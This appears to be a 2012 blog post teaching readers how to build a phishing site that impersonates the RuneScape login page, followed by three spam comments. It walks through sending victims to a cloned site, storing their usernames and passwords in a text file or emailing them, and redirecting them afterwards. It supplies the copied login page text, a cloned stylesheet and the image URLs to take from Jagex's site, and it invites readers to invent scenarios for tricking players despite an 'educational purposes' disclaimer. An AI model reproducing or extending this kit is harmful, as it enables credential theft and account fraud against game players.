Tuesday, January 3, 2012

How to make a Runescape Phisher (website)

This is for educational purposes only. I do not endorse tricking other players OR stealing from them. But many runescape players are so retarded that something should be done. This is a little outdated. You will need to download the latest images and script page from Jagex's site.

Here is the general idea behind the phisher: (If you dont understand PHP, then don't bother)

1. Victims are sent to your site instead of the normal runescape site.
2. Victims believe they are on the actual runescape site (site html docs are copied over, and all links leading to other parts of the site send them to the actual runescape URLs)
3. Victim presented with login, and enters username and password
4. Login "fails" , what actually happens: username/pass are stored to a text file or sent via email
5. Victim redirected towards an actual runescape page or actual runescape 404.

Typical scenarios to trick runescape players... think of your own.


Here is how to create your own runescape phishing site:

Save as index.php
Code:
<span class="highlight" style="background-image: none; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 235, 144); background-position: initial initial; background-repeat: repeat no-repeat; ">RuneScape</span> - the massive online adventure game by Jagex Ltd
Secure Login Main Menu
You need to log in to access this feature
Never enter your password anywhere except RuneScape.com
RuneScape username:
RuneScape password:
Need an account? To create an account to access our game and secure services, Click Here
Lost password? If you have lost/forgotten your password or need to recover your account,Click Here
This webpage and its contents are copyright © 1999 - 2007 Jagex Ltd. Use of this website is subject to our Terms+Conditions and Privacy policy
Save as rel.css
Code:
 .b {border-style: outset; border-width:3pt; border-color:#6A5A42}
  .b2 {border-style: outset; border-width:3pt; border-color:#570700}
  .white {text-decoration:none; color:#FFFFFF;}
  a.white:hover {text-decoration:underline}
  .red {text-decoration:none; color:#E10505;}
  a.red:hover {text-decoration:underline}
  .lblue {text-decoration:none; color:#9DB8C3;}
  a.lblue:hover {text-decoration:underline}
  .dblue {text-decoration:none; color:#0D6083;}
  a.dblue:hover {text-decoration:underline}
  .yellow {text-decoration:none; color:#FFE139;}
  a.yellow:hover {text-decoration:underline}
  .green {text-decoration:none; color:#04A800;}
  a.green:hover {text-decoration:underline}
  .purple {text-decoration:none; color:#C503FD;}
  a.purple:hover {text-decoration:underline}
  .pink {text-decoration:none; color:#FAA8AA;}
  a.pink:hover {text-decoration:underline}
a.grey {text-decoration:none; color:#C0C0C0;}
.grey {text-decoration:none; color:#C0C0C0;}
a.grey.hover {text-decoration:underline;}
body { background: black; color: white; font-family:Arial,Helvetica,sans-serif; font-size: 13px;
        background-image:url('images/bg2.jpg'); background-position:top center; background-repeat:repeat-y; text-align: center; margin: 0; }
      div#body {width: 765px; margin: 10px auto 10px auto; text-align: left; position: relative;}div,td { font-family:Arial,Helvetica,sans-serif; font-size: 13px; }
      a:hover { text-decoration: underline; }
      img { border: 0; }
      img a:hover {text-decoration:none;}
      .titleframe { width: 500px; margin-left: auto; margin-right: auto; padding: 4px; text-align: center; }
      .frame { width: 753px; margin-left: auto; margin-right: auto; padding: 4px; }
      .tandc { clear: both; font-size:11px; text-align:center; }
      .scroll { color: black; }
      .heading { text-align:center;margin: 6px; }
      .heading span {width: 125px; margin: 0 auto; display: block; background-image:url(http://www.runescape.com/lang/en/aff/runescape/img/smbrownback.jpg); border: 3px solid #3E3B23; border-top: 3px solid #7C774A; border-left: 3px solid #7C774A; background-color: #4D422E; padding: 3px 10px 3px 10px; }
        a { color: #90c040; text-decoration: none; }
        .scroll a { color: #7B4F17; font-weight: bold; }
        .e {border:2px solid #382418; background-color: black; }
          .wide_e { border: 2px solid #382418; background-color: black; }div.horizontalscroll { width: 765px; height: 159px; overflow: hidden; margin: 5px 0; background-color: #C2AB79; background-image: url("http://www.runescape.com/lang/en/aff/runescape/img/scroll/horizontal_scroll.gif"); position: relative;}
div.horizontalscroll-content { margin: 15px 40px; color: #000000; position: relative;}
div.widescroll { width: 735px; background-color: #C2AB79; margin: 0 10px 0 15px; position: relative;}
div.widescroll-bgimg { width: 745px; position: relative; margin: 0 -5px; background-image: url("http://www.runescape.com/lang/en/aff/runescape/img/scroll/backdrop_745.gif"); background-repeat: repeat-y;}
div.widescroll-content { padding: 25px 10px; color: #000000; position: relative; margin: 0 5px;}
img.widescroll-top { position: relative; top: 25px; padding:0; margin: 0; z-index: 100; display: block;}
img.widescroll-bottom { position: relative; padding:0; margin: 0; top: -25px; display: block;}
div.widescroll-content a, div.horizontalscroll-content a, div.narrowscroll-content a {color: #7B4F17; font-weight: bold; }
div.narrowscroll-bgimg { width: 457px; position: relative; margin: 0 -5px; background-image: url("http://www.runescape.com/lang/en/aff/runescape/img/scroll/scroll457t.gif"); background-repeat: repeat-y;}
div.narrowscroll-bg { width: 447px; background-color: #C2AB79; margin-left: 10px; }div.narrowscroll-content { padding: 25px 10px; color: #000000; position: relative; margin: 0 5px;}div.narrowscroll-content td { color: black; }img.narrowscroll-top { position: relative; top: 25px; padding:0; margin: 0; z-index: 100; display: block;}img.narrowscroll-bottom { position: relative; padding:0; margin: 0; top: -25px; display: block;}
now create a subdirectory called "images" (you.host.com/images/)
and upload these three images to it:
Code:
http://www.runescape.com/lang/en/aff/runescape/img/brownback.jpg
http://www.runescape.com/lang/en/aff/runescape/img/bg2.jpg
http://www.runescape.com/lang/en/aff/runescape/img/weblogin/onlyrs4.gif
The post data under username and password will send to a text file


Keywords:



how to make a runescape phishing site 2012, 
how to make a runescape phisher, 
runescape phisher 2012

3 comments:

  1. I believe this is among the so much vital information for
    me. And i'm glad reading your article. However should statement on few normal issues, The website style is ideal, the articles is actually excellent : D. Just right activity, cheers

    Feel free to visit my web page - Build My Own Website

    ReplyDelete
  2. Touche. Great arguments. Keep up the good work.

    my site; Creating A Website From Scratch

    ReplyDelete
  3. Hi there I am so thrilled I found your blog, I really found you by error, while I was browsing on Yahoo for
    something else, Nonetheless I am here now and would just like to say thank
    you for a fantastic post and a all round thrilling blog (I also
    love the theme/design), I don't have time to look over it all at the minute but I have bookmarked it and also added your RSS feeds, so when I have time I will be back to read more, Please do keep up the fantastic work.

    Stop by my site - Create Your Own Web Page

    ReplyDelete